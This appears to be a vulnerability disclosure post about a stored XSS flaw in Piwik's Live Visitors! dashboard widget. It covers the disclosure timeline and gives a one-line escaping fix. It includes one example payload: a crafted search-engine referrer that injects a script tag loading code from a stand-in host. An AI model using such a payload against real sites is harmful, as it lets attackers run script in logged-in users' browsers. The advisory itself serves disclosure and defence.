Cross-Site Scripting (XSS) Vulnerability in Piwik’s Live Visitors! Widget

The Live Visitors! widget for Piwik, an open source web analytics software similar to Google Analytics, contains a cross-site scripting (XSS) vulnerability which can allow malicious HTML to be added to Piwik’s Dashboard. The Dashboard is the page that users come to after logging in to Piwik and contains an overview of statistics.¬† The Live Visitors! widget was added to default Dashboard with Piwik 1.0.

The vulnerability exist because the Live Visitors! widget does not properly sanitize special characters from the referer_keyword field of the piwik_log_visit table in the database. The referer_keyword field stores the keyword(s) that a user had search for when they visit the website through a search engine. This vulnerability can be used to add malicious HTML code to the Dashboard while a visitor with a special crafted referer is currently being displayed in the Live Visitors! widget. For example, the following referrer would create a script tag calling the file example.com/malicious.js:

http://www.google.com/search?q=%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fexample.com%2Fmalicious.js%22%3E

The example.com/malicious.js could contain code that attempts to install malware on a computer or have some other malicious purpose.

For this to be exploited the victim would have to have the dashboard open when the visitor with the malicious code was being shown. The widget displays the last 10 visitors, so for high traffic website a visitor would appear for only a short time. By default Piwik only track visitors with JavaScript enabled, so just making GET requests with a malicious referer would not allow the vulnerability to be exploited.

We twice contacted Piwik’s security team about the issue. On December 2nd we provided them with basic details of the issue and on December 14th we contacted them with additional details of the issue and a possible fix for the issue. We have not received any response from them.

To insure that you are protected from the vulnerability being exploited you can remove the Live Visitors! widget from the Dashboard. A change that appears to fix the issue is to modify the following line in the file /plugins/Live/Visitor.php from

return $this->details['referer_keyword'];

to

return htmlspecialchars($this->details['referer_keyword']);

This change will cause special characters to be converted to HTML entities, so you would see the malicious code in text form instead of it being executed.